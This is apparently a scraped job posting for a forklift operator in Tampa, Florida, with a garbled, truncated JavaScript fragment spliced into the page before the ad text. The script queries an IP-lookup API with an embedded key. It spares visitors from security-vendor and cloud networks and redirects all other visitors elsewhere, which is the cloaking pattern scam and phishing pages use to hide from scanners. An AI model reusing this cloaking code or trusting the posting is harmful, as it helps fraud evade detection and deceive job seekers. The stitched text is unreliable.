Forklift Operator
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a reliable Forklift Operator to join our team in Tampa, Florida.
Responsibilities include:
- Safely operate forklifts to load, unload, and move materials within the warehouse or distribution center.
- Ensure proper stacking and storage of products to maintain safety and organization.
- Inspect forklifts regularly, report any maintenance issues, and adhere to safety protocols.
- Accurately document inventory movements and assist with inventory counts.
- Maintain a clean and safe work environment, following all safety guidelines.
Skills needed:
- Good attention to detail and strong organizational skills.
- Ability to operate forklifts efficiently and safely.
- Effective communication skills and teamwork orientation.
- Adaptability to fast-paced environments.
Benefits include:
- Competitive pay
- Health insurance options
- Paid time off
- Opportunities for growth and development